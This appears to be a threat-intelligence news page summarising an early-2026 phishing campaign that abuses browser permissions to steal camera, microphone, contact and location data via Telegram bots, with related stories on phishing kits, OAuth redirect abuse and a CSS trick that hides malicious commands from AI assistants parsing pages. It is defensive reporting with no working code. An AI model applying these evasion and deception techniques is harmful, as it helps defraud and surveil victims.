AI-Assisted Phishing Campaign Abusing Browser Permissions for Data Theft
A large-scale phishing campaign is using fake service and verification pages such as “ID Scanner,” “Telegram ID Freezing,” and “Health Fund AI” to trick victims into granting browser access to sensitive device capabilities. Once permissions are approved, malicious JavaScript captures images, video, microphone audio, device details, contact information, and approximate geolocation, then exfiltrates the data to attacker-controlled Telegram bots and related infrastructure. Researchers said the operation is hosted primarily on edgeone.app infrastructure and goes beyond traditional credential theft by collecting rich multimedia and contextual data that could support identity theft, follow-on social engineering, account compromise, or extortion.
Analysis of the phishing framework found signs of AI-assisted code generation, including structured annotations and emoji-style formatting embedded in the code, indicating generative AI may have been used to speed development of the campaign. A separate report on the DRILLAPP malware targeting Ukrainian entities describes a different espionage operation involving Microsoft Edge headless mode, LNK and HTA execution, and Russia-linked targeting; despite some overlap in browser permission abuse and media capture, it is not the same incident and should be excluded from this story.
Timeline
Mar 18, 2026
SC Media reports Cyble's findings on the phishing operation
SC Media summarized Cyble's research, emphasizing that the campaign had been active since early 2026 and used browser permission abuse instead of conventional credential harvesting to steal sensitive victim data.
Mar 16, 2026
Cyble discloses campaign and notes signs of AI-assisted development
Cyble Research & Intelligence Labs publicly reported the campaign, stating it was primarily hosted on edgeone.app infrastructure and highlighting code characteristics such as structured annotations and emoji-based formatting that may indicate AI-assisted script development.
Jan 1, 2026
Attackers exfiltrate stolen data via Telegram Bot API
Rather than relying on traditional credential theft or dedicated backend infrastructure, the operation used client-side JavaScript and legitimate browser APIs to gather data and sent the stolen information to attacker-controlled Telegram bots.
Jan 1, 2026
Campaign harvests browser-accessible biometric and device data
The phishing pages impersonated brands including TikTok, Telegram, Instagram, Chrome/Google Drive, and Flappy Bird, then abused browser permission prompts to collect camera images, video, microphone audio, contacts, device metadata, and approximate geolocation from victims.
Jan 1, 2026
AI-assisted phishing campaign begins targeting victims
A phishing operation became active in early 2026, using rotating social-engineering lures such as ID scanning, account freezing, and health-related themes to trick users into visiting malicious pages.
See the full picture in Mallory
Mallory subscribers get deeper analysis on every story, including:
Who’s affected and how
Deep-dive technical analysis
Actionable next steps for your team
IPs, domains, hashes, and more
Ask questions and take action on every story
Filter by topic, classification, timeframe
Get matching stories delivered automatically
Related Entities
Organizations
Affected Products
Sources
Related Stories
AI-Assisted Phishing Kits Targeting Microsoft and Google Users
A sophisticated phishing campaign has emerged, leveraging AI-assisted development to target Microsoft Outlook users, particularly Spanish speakers. The operation, active since March 2025, employs a modular phishing kit that mimics the Outlook login interface and uses real-time reconnaissance to enrich stolen credentials with IP and geolocation data. Stolen information is exfiltrated via Telegram bots and Discord webhooks, and the kit's evolution shows clear signs of AI-generated code, including clean structure and Spanish-language comments. Researchers identified the campaign through a unique mushroom emoji signature embedded in the phishing kit, which has been observed in over 75 deployments. In a parallel development, another phishing wave has exploited Google Cloud Application Integration to send convincing emails from legitimate Google addresses, bypassing traditional security filters. This campaign, uncovered by Check Point researchers, uses a multi-stage process: victims receive official-looking emails, are redirected through Google infrastructure, and ultimately land on a fake Microsoft login page designed to harvest credentials. The attack has targeted over 3,000 organizations globally, with significant activity in the United States, Asia-Pacific, and Europe. Both campaigns demonstrate the increasing sophistication and global reach of phishing operations using advanced technical methods and trusted platforms to deceive users.
1 months ago
Phishing Campaigns Evade Detection by Abusing AI and Trusted Email Security Controls
Security researchers reported multiple **phishing evasion** techniques designed to defeat modern email and AI-assisted defenses rather than relying only on traditional lure quality. One campaign analyzed by KnowBe4 used **graymail-style content padding** and extreme whitespace insertion to manipulate NLP-based email security tools, placing benign promotional text, legitimate signatures, and trusted links far below the visible phishing lure so scanners would weigh the message as less malicious. A separate LevelBlue-tracked trend showed attackers abusing enterprise **URL rewriting** and *Safe Links*-style protections by sending phishing through compromised accounts, causing security gateways to generate trusted wrapped URLs that could then be reused in campaigns targeting **Microsoft 365** users. The activity reflects a broader shift toward exploiting the gap between what users see and what automated systems inspect. In the URL-rewriting abuse, operators tied to **Tycoon2FA** and **Sneaky2FA** built multi-layer redirect chains across several trusted vendor domains to obscure final destinations and steal credentials and MFA session cookies through adversary-in-the-middle infrastructure, enabling account takeover, internal phishing, data theft, and sometimes ransomware follow-on activity. Related research from LayerX showed a different but thematically aligned evasion method in which **font rendering and CSS** make webpages display malicious commands to users while AI assistants parsing the underlying HTML see only harmless text, underscoring that attackers are increasingly targeting AI and trust-based inspection layers as part of phishing and social-engineering operations.
1 months ago
Phishing campaigns abuse trusted platforms and authentication flows to evade detection and steal credentials
Multiple active phishing operations are leveraging *trusted services* and *by-design web/authentication features* to bypass security controls and harvest credentials and MFA data. **GTFire** is a large-scale credential-harvesting campaign that hides behind legitimate Google-owned domains by abusing **Firebase** and **Google Translate** to make phishing links appear trustworthy to email filters and web gateways; victims are sent to brand-impersonation login pages and then redirected to the real site after submitting credentials. Separately, Microsoft reported phishing that abuses **OAuth redirection** behavior in identity providers (including **Microsoft Entra ID** and **Google Workspace**) by registering malicious OAuth apps with attacker-controlled redirect URIs and using silent auth flows/invalid scopes to bounce users to attacker infrastructure; Microsoft disabled the identified malicious Entra OAuth applications but noted related activity continues and requires monitoring. A distinct but thematically similar campaign uses a fake Google Account security site to trick users into installing a **malicious Progressive Web App (PWA)** that can steal one-time passcodes (via **WebOTP** where supported), harvest data (e.g., clipboard contents), and even turn the victim’s browser into an attacker-controlled **proxy** with internal port-scanning capability; Malwarebytes-linked reporting highlighted the lure domain `google-prism[.]com` and the use of permission prompts (notifications/clipboard) to enable ongoing abuse. Other items in the set cover unrelated threats (Android malware using generative AI for persistence, an Iraq-focused APT toolchain, a separate AiTM phishing-kit attribution case study, and research on a cybercrime infrastructure provider), and do not describe the same specific phishing operations described above.
1 months ago